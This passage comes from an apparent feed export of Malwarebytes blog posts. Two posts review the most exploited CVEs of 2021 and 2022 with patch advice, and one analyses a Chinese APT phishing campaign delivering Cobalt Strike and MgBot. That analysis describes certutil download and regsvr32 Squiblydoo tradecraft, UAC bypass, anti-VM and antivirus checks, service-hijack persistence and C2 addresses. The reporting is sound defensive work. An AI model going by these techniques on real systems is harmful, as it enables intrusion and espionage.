United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014&quot;This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.&quot;\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these &quot;requirements&quot; move it to the top of your &quot;to-patch&quot; list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> &quot;We learn from history that we learn nothing from history.&quot;\n\nBut since that&#x27;s a self-contradicting expression, let&#x27;s assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine&#x27;s single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache&#x27;s Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. Proxyshell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let&#x27;s take a stab at that. So we&#x27;re looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven&#x27;t already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote Code Execurion (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.\n * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.\n * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.\n\nSo I was hoping we can strike a deal. I&#x27;ll check next year how well this prediction does and you all patch these vulnerabilities real quick, so I can write about some new ones next year.\n\n* * *\n\n**We don&#x27;t just report on vulnerabilities--we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-07T18:30:00", "type": "malwarebytes", "title": "2022's most routinely exploited vulnerabilities\u2014history repeats", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-07T18:30:00", "id": "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "href": "https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-07T08:03:43", "description": "_This blog post was authored by Hossein Jazi and J\u00e9r\u00f4me Segura_\n\nOn July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike. \n\nOne day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.\n\nOn July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK&#x27;s prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.\n\nConsidering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.\n\n### Active targeting with different lures\n\nWe were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.\n\n#### &#x27;Mail security check&#x27; with Cobalt Strike (variant 1)\n\nThis campaign was most likely carried out through spear phishing emails. The .rar file (_Mail security check.rar_) includes a document with the same name (Figure 1). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/mailsecuritycheck-1.png> \"\" )Figure 1: Mail security check.docx\n\nThe document uses template injection to download a remote template from the following URL (Figure 2). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplate-1.png> \"\" )Figure 2: Template injection\n\nThe downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document&#x27;s content (Figure 3).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-1.png> \"\" )Figure 3: Encoded command\n\nAfter decoding, we can see the list of commands that will be executed by DDE:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-1.png> \"\" )Figure 4: Decoded commands\n\nAs Figure 4 shows, the threat actors used _certutil _with_ -urlcache -split -f_ parameters to download a _com scriptlet_ from its server and then used the _[Squiblydoo](<https://car.mitre.org/analytics/CAR-2019-04-003/>)_ technique to execute the downloaded scriptlet via _regsvr32.exe _on the victim machine.\n\nThis scriptlet is stored in the _Documents_ directory as &quot;ff.sct&quot;. The scriptlet is an XML file that has embedded VBscript (Figure 5). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/sct-file-1.png> \"\" )Figure 5: ff.sct snipplet\n\nThe scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanism and is responsible for injecting the embedded payload into _rundll32.exe_ using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike. \n\nThe following diagram shows the overall process of this attack:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.29.43-PM.png> \"\" )Figure 6: Overall process\n\n#### &#x27;Mail security check&#x27; with MgBot (variant 2)\n\nAs we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload. \n\nFigure 7 shows the new encoded commands embedded within the template file. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-2-1.png> \"\" )Figure 7: Encoded command\n\nFigure 8 shows the list of commands that will be executed by DDE. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-2-1.png> \"\" )Figure 8: Decoded commands\n\nIn this new template file, the _storm.sct_ scriptlet was replaced with _storm.txt_. Similar to the previous version, _certutil_ is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.\n\nThe following diagram shows the overall execution process:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.30.07-PM.png> \"\" )Figure 9: Overall execution process\n\n#### &quot;Boris Johnson Pledges to Admit 3 Million From Hong Kong&quot; with MgBot (variant 3)\n\nThe last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named &quot;Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar&quot;.\n\nThis document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/boris-1.png> \"\" )Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.\n\nSimilar to the other documents, it also uses template injection to download the remote template (Figure 11).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplteBoris-1.png> \"\" )Figure 11: Remote template \n\nThe downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in which it uses DDE to download and drop its loader. \n\n### Payload analysis: MgBot (BLame, Mgmbot)\n\nThe dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a _Realtek Audio Manager tool_ (Figure 12).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.25-PM-300x115-1.png> \"\" )Figure 12: File version information\n\nIt has four embedded resources in which two of them are in Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.58-PM-2.png> \"\" )Figure 13: Resource language\n\nThe loader starts its process by escalating privilege through a UAC bypass using the [CMSTPLUA COM interface](<https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz>).\n\nMgBot uses several anti-analysis and anti-virtualization techniques. The code is self modifying which means it alters its code sections during runtime. This makes static analysis of the sample harder.\n\nMgBot tries to avoid running in known virtualized environment such as _VmWare_,_ Sandboxie_ and _VirtualBox_. To identify if it&#x27;s running in one of these environments, it looks for the following DLL files: _vmhgfs.dll_, _sbiedll.dll_ and _vboxogl.dll_ and if it finds any of these DLLs, it goes to an infinite loop without doing any malicious activity (Figure 14).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/virutalizationChecks-1.png> \"\" )Figure 14: Anti-VMs\n\nIt also checks for the presence of security products on the victim&#x27;s machine and takes a different execution flow if a security product is detected. For example, it checks for _zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe _in different parts of the code (Figure 15). The malware does not perform all the checks at once and it rather checks a couple of them at different steps of its execution. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/av-1.png> \"\" )Figure 15: Security products checks\n\nTo invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/apis-1.png> \"\" )Figure 16: Building function pointer table\n\nAs an example, when the malware needs to invoke _WinExec_, it does so by invoking it through its index from the function pointer table.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/winexec-1.png> \"\" )Figure 17: Calling API through use of function pointer table\n\nAfter building the required API calls table, the malware performs the following procedures: \n\n * It calls _CreateFileW_ to create _iot7D6E.tmp_ (random name starting with iot) into the _%APPDATA%Temp_ directory. This tmp file is a cab file that embedds the final payload.\n * It calls _WriteFile_ to populate its content\n * It calls _CreateProcessInternalW_ to invoke _expand.exe_ to decompress the content of _iot7D6E.tmp_ into _ProgramData\\Microsoft\\PlayReady\\MSIBACF.tmp\\tmp.dat_ (the _MSIBACF.tmp_ directory name is generated randomly and starts with MSI and then is followed by a combination of random numbers and characters)\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/expand-1.png> \"\" )Figure 18: Calling expand.exe\n\n * It calls _CopyFileW_ to copy tmp.dat into _pMsrvd.dll_\n * It calls _DeleteFileW_ to delete _tmp.dat_\n * It drops _DBEngin.EXE_ and _WUAUCTL.EXE_ in the _ProgramData\\Microsoft\\PlayReady_ directory. Both of these files are _rundll32.exe_ that is used later to execute the dropped DLL.\n * It modifies the registry hive of of _HKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt_ registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory which are the old and new registry hives for the mentioned registry location.\n\nTo load the dropped DLL (_pMsrvd.dll_) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/reg2new-1.png> \"\" )Figure 18: ServiceDll\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/regnew1-1.png> \"\" )Figure 19: ImagePath\n\nFinally, it executes the dropped DLL by running_ net start AppMgmt_. After loading the DLL, the Loader creates a cmd file (_lgt*.tmp_.cmd) in the _%APPDATA%TEMP _directory with the content shown in Figure 20. Then it executes it to delete the cmd file and loader from the victim&#x27;s machine. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/cmdnew-1.png> \"\" )Figure 20: cmd file\n\nWe were able to identify several different variants of this loader. In general, all the variants drop the final payload using _expand.exe_ or _extrac32.exe _and then use &quot;net start _AppMgmt_&quot; or &quot;net start StiSvc&quot; to execute the dropped DLL with one of the following configurations:\n\n * svchost.exe -k netsvcs -p -s AppMgmt\n * svchost.exe -k netsvcs\n * svchost.exe -k imgsvc\n\nThe dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a _Video Team Desktop App. _\n\nFigure 21: File info\n\nThe creation time for this DLL appears to be &quot;2008-04-26 16:41:12&quot;. However, based on Rich header data, we can assert that this might have been tampered with by the threat actor. \n\nFigure 22: Rich header\n\nThe DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmicode-1.png> \"\" )Figure 23: Injection into WmiPrvse.exe\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmi-1.png> \"\" )Figure 24: RAT&#x27;s DLL is injected into memory space of WmiPrvse.exe\n\nIt uses several anti-debugging and anti-virtualization techniques to detect if it&#x27;s running in a virtualized environment or if it is being debugged by a debugger. It uses _GetTickCount_ and _QueryPerformanceCounter_ API calls to detect the debugger environment.\n\nTo detect if it is running in a virtual environment, it uses anti-vm detection instructions such as _sldt_ and _cpid_ that can provide information about the processor and also checks Vmware IO ports (VMXH).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/type-510x600-1.png> \"\" )Figure 25: Environment Detection\n\nAll the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard. \n\nThis final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as: \n\n * C2 communication over TCP (42.99.116[.]225:12800)\n * Ability to take screenshots\n * Keylogging\n * File and directory management\n * Process management\n * Create MUTEX\n\n### Infrastructure relations\n\nThe following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.\n\nWhat is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VT-1-1.png> \"\" )Figure 26: Infrastructure connections\n\n### Android RAT\n\nWe also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as _Android/Trojan.Spy.AndroRat.KSRemote_.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/android-1.png> \"\" )Figure 27: Malicious Android APK\n\nAll these bogus applications contain a jar file named _[ksremote.jar](<https://www.virustotal.com/gui/file/5f76192e952fd0002c1df4b66423ae803536ad82a1ae36bc9bfc6f73a7093b7f/detection>)_ that provides the RAT functionality:\n\n * Recording screen and audio using the phone&#x27;ss camera/mic\n * Locating phone with coordinates\n * Stealing phone contacts, call log, SMS, web history\n * Sending SMS messages\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/contacts-1.png> \"\" )Figure 28: Contact grabbing capability\n\nThis RAT communicates with C&amp;C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong)\n\n * 122.10.89[.]172:10560\n * 122.10.89[.]170:9552\n * 122.10.89[.]172:10560\n\n### TTPs in line with Chinese APTs\n\nThe lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.\n\nThe TTPs observed in these attacks have been used by several Chinese APT groups:\n\n * [Rancor](<https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/>) APT is known to use Certutil to download their payload\n * [KeyBoy](<https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html>) is known to have used DDE is its previous campaigns\n * APT40 has utilized [Squiblydoo](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>) and [template 